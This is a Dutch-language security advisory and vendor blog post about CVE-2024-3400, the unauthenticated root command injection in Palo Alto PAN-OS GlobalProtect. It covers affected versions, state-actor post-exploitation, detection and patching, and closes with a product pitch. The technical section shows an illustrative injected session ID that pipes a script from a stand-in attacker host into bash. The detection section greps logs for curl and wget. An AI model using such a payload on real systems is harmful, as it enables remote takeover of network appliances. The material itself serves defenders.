CVE-2024-3400: Palo Alto PAN-OS Command Injection — CVSS 10.0
Kort samengevat: CVE-2024-3400 is een OS command injection-kwetsbaarheid met maximale ernst in de GlobalProtect-gateway van Palo Alto Networks PAN-OS. Een niet-geauthenticeerde aanvaller kan willekeurige OS-commando's als root uitvoeren, zonder enige interactie vereist. Geëxploiteerd door UTA0218 (vermoedelijk statelijk gesponsord) vóór openbaarmaking.
| Kenmerk | Waarde |
|---|---|
| CVE ID | CVE-2024-3400 |
| CVSS-vector | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| CWE | CWE-77: OS Command Injection |
| Gepubliceerd | 12 april 2024 |
| Exploitatie | Actief — CISA KEV, exploitatie door natiestaat |
CVSS 10.0 — KRITIEK (MAX)
Wat is CVE-2024-3400?
CVE-2024-3400 treft de GlobalProtect-functie van Palo Alto Networks PAN-OS. Wanneer GlobalProtect is geconfigureerd als gateway of portal, kan een niet-geauthenticeerde externe aanvaller willekeurige OS-commando's injecteren die met rootrechten worden uitgevoerd op de firewall-appliance.
De combinatie van factoren — geen authenticatie vereist, netwerktoegankelijk, gewijzigde scope, maximale impact op vertrouwelijkheid, integriteit en beschikbaarheid — levert een perfecte CVSS-score van 10.0 op. Onder firewallleveranciers hebben slechts een handvol kwetsbaarheden ooit deze score gekregen.
Volexity ontdekte deze kwetsbaarheid tijdens de respons op een incident waarbij UTA0218, een geavanceerde dreigingsactor, een nieuwe Python-backdoor genaamd UPSTYLE had geïnstalleerd op gecompromitteerde PAN-OS-apparaten. De aanvaller gebruikte de firewall als pivotpunt om interne netwerken te bereiken, Active Directory-credentials te stelen en gevoelige data te exfiltreren. Volexity schat dat de exploitatie eind maart 2024 begon — weken voordat Palo Alto werd geïnformeerd.
Getroffen systemen
| PAN-OS-versie | Getroffen (GlobalProtect ingeschakeld) | Gerepareerde versie |
|---|---|---|
| PAN-OS 11.1 | < 11.1.2-h3 | 11.1.2-h3+ |
| PAN-OS 11.0 | < 11.0.4-h1 | 11.0.4-h1+ |
| PAN-OS 10.2 | < 10.2.9-h1 | 10.2.9-h1+ |
| PAN-OS 10.1 | < 10.1.14-h4 | 10.1.14-h4+ |
Vereiste: GlobalProtect-gateway of -portal moet geconfigureerd zijn (show global-protect-gateway current-user geeft resultaten terug). Organisaties die GlobalProtect niet hebben geconfigureerd, zijn niet getroffen.
Technische analyse
Het injectiepunt bevindt zich in de code voor sessieafhandeling van GlobalProtect. Wanneer een GlobalProtect-sessie tot stand komt, worden bepaalde sessiekenmerken naar tijdelijke bestanden op de firewall geschreven. De code die het bestandspad voor deze sessiebestanden opbouwt, saneert de sessie-identifier — die gedeeltelijk door de aanvaller gecontroleerd wordt — niet correct.
# Simplified vulnerable file path construction
SESSION_ID = request.cookie["SESSID"] # Attacker-controlled
session_file = f"/var/appweb/sslvpndocs/global-protect/{SESSION_ID}.log"
os.system(f"echo 'connected' >> {session_file}") # Command injection here
# Attacker crafts session ID containing shell metacharacters:
# SESSION_ID = "../../tmp/evil;curl http://attacker.com/shell.sh|bash;"
De door UTA0218 geïnstalleerde UPSTYLE-backdoor gebruikte een nieuw persistentiemechanisme: een Python-script dat de toegangslogs van de webserver monitorde op specifieke verzoekpatronen (met een versleuteld commando), de commando's uitvoerde, en vervolgens de oorspronkelijke bestandsinhoud herstelde om bewijs van de activiteit te verwijderen.
Post-exploitatieactiviteit (UTA0218)
Volexity documenteerde de volgende post-exploitatiesequentie van statelijke actoren:
- UPSTYLE-implementatie: Python-backdoor geïnstalleerd in het webserverpad van de firewall voor persistente toegang
- Credential-extractie: dump van de firewallconfiguratie met VPN-credentials en interne routeringsinformatie
- Interne pivotering: gebruik van de vertrouwde netwerkpositie van de gecompromitteerde firewall om interne hosts te bereiken
- LDAP-queries: Active Directory-enumeratie via de interne netwerktoegang van de firewall
- Data-staging: compressie en exfiltratie van gevoelige bestanden via de firewall
Detectie
Analyse van PAN-OS-logs
# Check for UPSTYLE backdoor artifacts find / -name "*.py" -newer /etc/passwd -not -path "*/site-packages/*" 2>/dev/null # Suspicious traffic in GlobalProtect logs grep -i "curl\|wget\|python\|bash" /var/log/pan/sslvpn.log # Modified system files (UPSTYLE modifies then restores) # Check for recent access times on web server files find /var/appweb -atime -7 -name "*.php" -o -name "*.py"
Threat hunting-query's
- HTTP 200-reacties op GlobalProtect-paden met ongebruikelijke sessiecookie-formaten
- Uitgaande verbindingen van het firewall-managementvlak naar externe IP's
- DNS-query's vanuit PAN-OS naar domeinen die niet in de threat intelligence-feed staan
- Ongebruikelijke tijdstempels van bestandswijzigingen in firewallconfiguratiebestanden
Mitigatie
- Patch onmiddellijk: pas de hierboven vermelde hotfix-versies toe. Dit is een CVSS 10.0 met actieve exploitatie — er is geen aanvaardbare vertraging.
- Tijdelijke workaround via Threat Prevention: voor ongepatchte apparaten, schakel Threat Prevention in met beveiligingsprofielen op GlobalProtect-interfaces. Palo Alto leverde specifieke threat ID-signaturen.
- Schakel GlobalProtect uit indien niet nodig: organisaties die GlobalProtect niet actief gebruiken, kunnen de functie tijdelijk uitschakelen als workaround.
- Audit firewallbestanden: voer het door Palo Alto geleverde script uit om te controleren op UPSTYLE en andere post-exploitatie-artefacten.
- Roteer alle credentials: alle credentials opgeslagen in de firewallconfiguratie (VPN-certificaten, LDAP-bind-credentials, enz.) moeten als gecompromitteerd worden beschouwd.
💡 CISA-noodrichtlijn: CISA vaardigde Emergency Directive 24-03 uit, die alle Amerikaanse federale overheidsinstanties verplichtte om vóór 19 april 2024 patches of mitigaties toe te passen. De urgentie weerspiegelt de ernst en actieve exploitatie door geavanceerde dreigingsactoren.
KENSAI-detectiemogelijkheden
- PAN-OS-fingerprinting: KENSAI identificeert aan internet blootgestelde Palo Alto-apparaten en hun PAN-OS-versies, en markeert configuraties die kwetsbaar zijn voor CVE-2024-3400
- Detectie van GlobalProtect-blootstelling: identificeert of GlobalProtect-gateway/-portal is ingeschakeld op gedetecteerde apparaten
- Veilige exploitatiebevestiging: niet-destructieve test verifieert exploiteerbaarheid zonder commando's uit te voeren
- Scanning op compromitteringsindicatoren: controleert op UPSTYLE-backdoorindicatoren in toegankelijke webpaden
- Continue monitoring van het aanvalsoppervlak: waarschuwt bij nieuw ontdekte PAN-OS-apparaten die uw externe aanvalsoppervlak binnenkomen
KENSAI identificeert direct aan internet blootgestelde PAN-OS-apparaten die kwetsbaar zijn voor command injection. Wacht niet tot dreigingsactoren ze eerder vinden.
Scan nu uw perimeter